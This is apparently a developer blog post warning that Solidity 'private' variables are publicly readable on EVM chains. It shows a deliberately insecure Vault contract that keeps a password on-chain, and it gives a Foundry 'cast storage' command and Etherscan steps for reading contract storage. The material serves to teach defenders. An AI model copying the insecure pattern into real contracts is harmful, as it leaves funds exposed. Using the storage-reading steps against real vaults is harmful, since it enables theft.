menu
Private variables are not really private on EVM

Private variables are not really private on EVM

posted Originally published at app.daily.dev 2 min read

Private variables on EVM blockchains are not really private and hidden

  • Do you think storing important keys and data in private key's are safer on EVM chains. Definition say's all, EVM is an transparent chain
  • Attackers will always looks for deployed contract addresses of contracts that are vulnerable and contains funds
  • marking a variable as private only prevents other contracts from accessing it.
  • State variables marked as private and local variables are still publicly accessible

Simple contract scenario

  • The given contract stores password on-chain and it is marked as private variable
contract Vault {
        bool public locked;
@>  bytes32 private password;

    constructor(bytes32 _password) {
        locked = true;
        password = _password;
    }
    function unlock(bytes32 _password) public {
        if (password == _password) {
            locked = false;
        }
    } 
}
  • Above Contract stored password inside an private variable, thinking that it's safer and no one can access it!!!

Simple way to access private and public data of deployed contracts

  • With the help of contract addess and storage layout, attackers can easily read the data from private and public data stored on-chain

1. Through cast commands:

  • Dev's using foundry can use cast commands to access storage layout of any contract using below commands.
cast storage --rpc-url $SEPOLIA_RPC_URL --etherscan-api-key $ETHERSCAN_API_KEY CONTRACT_ADDRESS SLOT_NUMBER
  • This command can be used to easily read private variables stored on-chain

2. Through Etherscan:

  • Go to Etherscan and search for contract address

  • Copy and explore the TNX hash from internal transactions

  • Go for state and look for all storage value present!!!

PRIVATE-DATA-2

PRIVATE-DATA-3

Try this CTF to gain more understanding

Real time case studies you want to look

So be aware of what you are storing on-chain and how you are enabling attackers to explore your contract and drains out all funds

1 Comment

Nice point here, private in Solidity means visibility not secrecy, love the practical cast tip, how many devs still stash secrets on chain?

0 votes

More Posts

Advance EVM - Opcodes, low-level calls and instructions

abiEncode - Jul 3, 2025

Introduction to solidity smart contracts storage layout -- What are risks in manipulating storage???

abiEncode - Jun 30, 2025

Blockchain Devops

abiEncode - Jun 29, 2025

What are Price Oracle Manipulation Attacks in Blockchain contracts and EVM???

abiEncode - Jul 5, 2025

Unlocking Ethereum: From Magic Money to Math-Powered Machines

ALLAN ROBINSON - Jul 12, 2025
chevron_left

More From abiEncode

Part-1: Intro to MEV(Maximal Extractable value) Attack

Blockchain File Storage---What is IPFS and Types of web3 Storage

What are Price Oracle Manipulation Attacks in Blockchain contracts and EVM???

Related Jobs

View all jobs →

Commenters (This Week)

1 comment
1 comment

Contribute meaningful comments to climb the leaderboard and earn badges!